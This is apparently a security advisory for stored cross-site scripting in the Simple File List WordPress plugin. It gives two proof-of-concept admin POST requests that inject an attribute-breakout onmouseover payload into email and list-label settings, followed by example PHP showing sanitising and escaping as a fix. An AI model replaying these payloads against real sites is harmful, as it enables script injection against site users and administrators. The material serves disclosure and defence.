The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in a multisite setup).
PoC
# First Stored XSS - HTTP Request
POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=email_settings HTTP/1.1
Host: target
…
…
eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Demail_settings&eeNotifyTo=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyCc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyBcc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFrom=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFromName=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifySubject=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyMessage=Greetings%2C%0D%0A%0D%0AYou+should+know+that+a+file+has+been+uploaded+to+your+website.%0D%0A%0D%0A%5Bfile-list%5D%0D%0A%0D%0AFile+List%3A+%5Bweb-page%5D&submit=SAVE

+++++++++++++++++++++++

# Second Stored XSS - HTTP Request
POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=list_settings HTTP/1.1
Host: target
…
…
eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Dlist_settings&eeShowList=YES&eeSortBy=DateMod&eeSortOrder=Descending&eeGenerateImgThumbs=YES&eeShowFileThumb=YES&eeLabelThumb=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeLabelName=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileDate=YES&eeLabelDate=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileSize=YES&eeLabelSize=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowHeader=YES&eeSmoothScroll=YES&eeShowFileDescription=YES&eeShowFileExtension=YES&eeShowFileActions=YES&eeShowFileOpen=YES&eeShowFileDownload=YES&eeShowFileCopyLink=YES&submit=SAVE
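
A save-and-render pattern that closes this class of bug for the email settings fields in the first request, as an added example that is not the plugin's own code. It assumes the settings are stored with update_option() and echoed back into input value attributes, the context the payload's leading double quote breaks out of; the function names, option name and nonce action are hypothetical.

```php
<?php
// Added example, not Simple File List's code. example_* names, the option name
// and the nonce action are hypothetical; the eeNotify* keys and the nonce field
// name are the POST parameters shown in the request above.

// Read one POST field as a string, undoing WordPress's added slashes.
function example_post_string( $key ) {
    return ( isset( $_POST[ $key ] ) && is_string( $_POST[ $key ] ) )
        ? wp_unslash( $_POST[ $key ] )
        : '';
}

// Save handler: check capability and nonce, then sanitise each field by type.
function example_save_email_settings() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden' );
    }
    check_admin_referer( 'example-save-settings', 'ee-simple-file-list-settings-nonce' );

    $settings = array();
    // Assumption: each address field holds a single address.
    foreach ( array( 'eeNotifyTo', 'eeNotifyCc', 'eeNotifyBcc', 'eeNotifyFrom' ) as $key ) {
        // Drops characters that are not valid in an email address.
        $settings[ $key ] = sanitize_email( example_post_string( $key ) );
    }
    foreach ( array( 'eeNotifyFromName', 'eeNotifySubject' ) as $key ) {
        // Strips tags and line breaks, but leaves double quotes in the value,
        // so this step alone does not neutralise the PoC string.
        $settings[ $key ] = sanitize_text_field( example_post_string( $key ) );
    }
    update_option( 'example_email_settings', $settings );
}

// Settings form: escape for the HTML attribute context at output time.
function example_render_text_input( $key ) {
    $settings = get_option( 'example_email_settings', array() );
    $value    = isset( $settings[ $key ] ) ? $settings[ $key ] : '';
    printf(
        '<input type="text" name="%1$s" value="%2$s" />',
        esc_attr( $key ),
        esc_attr( $value ) // a stored " is emitted as &quot; and stays inside value
    );
}
```

The list settings labels in the second request (eeLabelThumb, eeLabelName, eeLabelDate, eeLabelSize) need the same treatment: sanitize_text_field() on save and esc_attr() or esc_html() on output, depending on where the label is printed.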